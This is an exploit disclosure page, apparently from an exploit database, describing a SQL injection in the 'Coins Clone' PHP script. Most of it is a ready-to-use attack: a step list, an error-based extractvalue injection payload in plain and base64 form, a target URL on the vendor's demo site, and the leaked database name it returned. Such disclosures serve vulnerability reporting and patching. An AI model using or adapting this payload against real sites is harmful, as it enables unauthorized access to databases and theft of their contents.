Coins Clone - PHP Script SQL Injection

2020.04.19
Risk: Medium
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

# Exploit Title: Coins Clone - PHP Script SQL Injection # Date: 2020-04-16 # Exploit Author: UltraSecurityTeam # Team Member = Ashkan Moghaddas , AmirMohammad Safari , Behzad khalifeh # Vendor Homepage: https://www.coinsclone.com/ # Version: All Version # Tested on: ubuntu # Special Thanks : Meisam Monsef (@meisamrce) Exploit: 1 - Please login or create account 2 - convert your sql injection command to base64 23 and extractvalue(1,concat(0x3a,database(),0x3a)) -> my injection command to base64 encode : MjMgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDNhLGRhdGFiYXNlKCksMHgzYSkp 3 -go this page and injection https://demo2.coinsclone.com/traderprofile/[base64 SQL Injection] https://demo2.coinsclone.com/traderprofile/MjMgYW5kIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDNhLGRhdGFiYXNlKCksMHgzYSkp 4 - result : XPATH syntax error: ':demo2coi_dmusrlcb:'


Vote for this issue:
100%
0%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2020, cxsecurity.com

 

Back to Top